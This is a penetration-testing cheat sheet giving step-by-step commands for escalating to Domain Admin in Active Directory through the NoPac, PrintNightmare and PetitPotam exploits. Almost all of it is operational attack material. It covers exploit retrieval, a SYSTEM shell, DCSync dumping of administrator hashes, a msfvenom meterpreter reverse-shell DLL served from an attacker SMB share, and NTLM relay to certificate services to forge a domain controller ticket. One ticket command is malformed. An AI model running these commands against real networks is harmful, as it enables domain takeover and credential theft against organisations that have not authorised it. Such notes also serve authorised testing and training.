# Privilege Escalation to Domain Admin using Known Exploits ## **NoPac** * NoPac is an intra-domain privilege escalation exploit that allows escalating privileges from any standard user to domain admin level access * This exploit path takes advantage of being able to change the SamAccountName of a computer account to that of a Domain Controller. * The flow of the attack is outlined here: [SecureWorks Blog](https://www.secureworks.com/blog/nopac-a-tale-of-two-vulnerabilities-that-could-end-in-ransomware) **Exploiting NoPac:** 1. Get the NoPac exploit: `git clone https://github.com/Ridter/noPac.git` 2. Check if target is vulnerable: `sudo python3 scanner.py domain.name/validuser:validpassword -dc-ip 172.16.5.5 -use-ldap` 3. Get a SYSTEM shell as the built-in administrator: `sudo python3 noPac.py DOMAIN.NAME/validuser:validpassword -dc-ip 172.16.5.5 -dc-host DC-NAME -shell --impersonate administrator -use-ldap` 4. Perform DCSync against the built-in administrator: `sudo python3 noPac.py DOMAIN.NAME/validuser:validpassword -dc-ip 172.16.5.5 -dc-host DC-NAME --impersonate administrator -use-ldap -dump -just-dc-user DOMAIN.NAME/administrator` *** ## **PrintNightmare** * Vulnerability found in the Print Spooler service that runs on all Windows operating systems that allows for privilege escalation and remote code execution. **Exploiting PrintNightmare:** 1. Get the exploit: `git clone https://github.com/cube0x0/CVE-2021-1675.git` 2. Install cube0x0's version of impacket: ``` pip3 uninstall impacket git clone https://github.com/cube0x0/impacket cd impacket python3 ./setup.py install ``` 3. Check if the Windows target has MS-PAR & MSRPRN exposed:\ `rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MS-PAR'` 4. Generate a DLL payload to be used by the exploit to gain a shell session:\ `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=local-ip LPORT=anyport -f dll > backupscript.dll` 5. Create an SMB server and host a shared folder (Data) at the location of the DLL payload that the exploit will attempt to download:\ `sudo smbserver.py -smb2support Data /path/to/backupscript.dll` 6. Run the exploit:\ `sudo python3 CVE-2021-1675.py domain.name/validusername:validpassword@DC-IP '\\attacker-ip\CompData\backupscript.dll'` *** ## **PetitPotam** * PetitPotam is an LSA spoofing vulnerability that allows forcing the domain controller to authenticate against another host using NTLM over port 445 * This attack allows an unauthenticated user to take over the domain * More information about PetitPotam can be found here: [DirkJanm Post](https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/) **Exploiting PetitPotam:** 1. Start an NTLM relay: `sudo ntlmrelayx.py -debug -smb2support --target http://DOMAIN/URL/to/Certificate/Authoirty/host --adcs --template DomainController` Note: you can use [certi](https://github.com/zer1t0/certi) to find the location of the CA 2. Get Petit Potam: `git clone https://github.com/topotam/PetitPotam.git` 3. Run Petit Potam. \`python3 PetitPotam.py attacker-ip dc-ip 4. If it worked, you will find the base64 encoded certificate for the domain controller on the NTLM relay shell 5. Request a TGT for the domain controller using the certificate: `python3 /PKINITtools/gettgtpkinit.py DOMAIN.NAME/DC-NAME\$ -pfx-base64 = dc01.ccache` 6. Set the KRB5CCNAME environment variable to the previous output file: `export KRB5CCNAME=dc01.ccache` 7. Perform DCSync using (`-k`) the previous ccache file : `secretsdump.py -just-dc-user DOMAIN.NAME/administrator -k -no-pass DC-NAME.DOMAIN.NAME`